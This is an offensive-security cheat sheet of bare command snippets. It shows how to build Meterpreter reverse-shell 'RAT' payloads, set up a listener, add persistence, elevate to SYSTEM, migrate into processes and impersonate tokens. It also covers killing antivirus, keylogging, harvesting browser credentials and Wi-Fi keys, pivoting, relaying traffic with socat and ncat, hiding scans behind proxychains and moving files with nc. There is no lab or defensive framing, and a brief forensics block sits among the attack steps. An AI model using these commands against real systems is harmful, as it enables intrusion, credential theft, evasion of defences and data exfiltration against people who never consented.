Start a Shell in Python
python -c 'import pty; pty.spawn("/bin/bash")'
Export WiFi Keys
netsh wlan export profile folder=%TEMP%
cat /etc/wpa_supplicant.conf
Check for MS08-067
nmap -p 445 --script=smb-check-vulns --script-args=unsafe=1 $@
Create RAT:
msfpayload windows/meterpreter/reverse_{tcp,http,https} LHOST=<ip> LPORT=<port> X > rat.exe
Create VBS RAT:
msfpayload windows/meterpreter/reverse_{tcp,http,https} LHOST=<ip> LPORT=<port> R > rat.raw
python shellcode2vbscript.py rat.raw rat.vbs
Encode RAT:
msfencode and msfvenom
Listener:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Listen for multiple connections:
exploit -j / sessions / sessions -i
Hijack another process:
migrate <pid> or run migrate -n <process name>
Install RAT:
run persistence
Elevate to SYSTEM:
getsystem
Metasploit pivoting (This allows you to access the local LAN via the already comprimised host):
run autoroute -s <local network/cidr>
Impersonate users:
incognito, impersonate_token
Metasploit: kill av
dd if=<in file> of=<out file>
$ mkdir <mountpoint>
$ mount -o loop -t <type> <image> <mountpoint>
$ foremost -i <image> -t all -v
$ scalpel $
Metasploit: run post/* (e.g. run post/windows/capture/keylog_recorder)
firefox_creds
dumplinks
Metasploit: download command
Listen-Connect: Relay connections on lport to rhost:rport socat tcp-listen:<lport>,reuseaddr tcp-connect:<rhost>:<rport>
ncat -l <lport> -c "ncat <rhost> <rport>"
Listen-Listen: Connect to lport1 then lport2 socat tcp-listen:<lport1>,reuseaddr tcp-listen:<lport2>
ncat -l <lport 1> -c "ncat -l <lport2>"
Connect-Connect: Listeners must first be set up on rhost:rport socat tcp-connect:<rhost1>:<rport1>,reuseaddr tcp-connect:<rhost2>:<rport2>
ncat <rhost1> <rport1> -c "ncat <rhost2> <rport2>"
SSH Tunnels:
ssh <user>@<host> -L <lport>:<rhost>:<rport>
ssh <user>@<host> -R <port>:<rhost>:<rport>
SSH into a jumpbox and run tshark
jumpbox$ tshark -i eth0 not port 22 and tcp
See what non-anonymous scan looks like (your public IP will show up in tshark):
localhost$ nmap <jumpbox ip> -p 80
Test anonymous scanning (real IP still shows up in tshark):
localhost$ proxychains nmap <jumpbox ip> -p 80
Run an anonymous connect scan (real IP only shows up initially in tshark):
localhost$ proxychains nmap -sT <jumpbox ip> -p 80
Try again (real IP does not show up in tshark):
localhost$ proxychains nmap -sT -Pn <jumpbox ip> -p 80
Note: scanning a hostname instead of IP will put a DNS request from your real IP in the logs–scan the direct IP instead. (see proxyresolv)
Setup iptables to disallow all traffic to target (forces you to send it over proxychains):
`iptables -A OUTPUT --dest <target ip> -j DROP`
File transfer:
nc -l <port> <ip> < <input file>
nc <ip> <port> > <output file>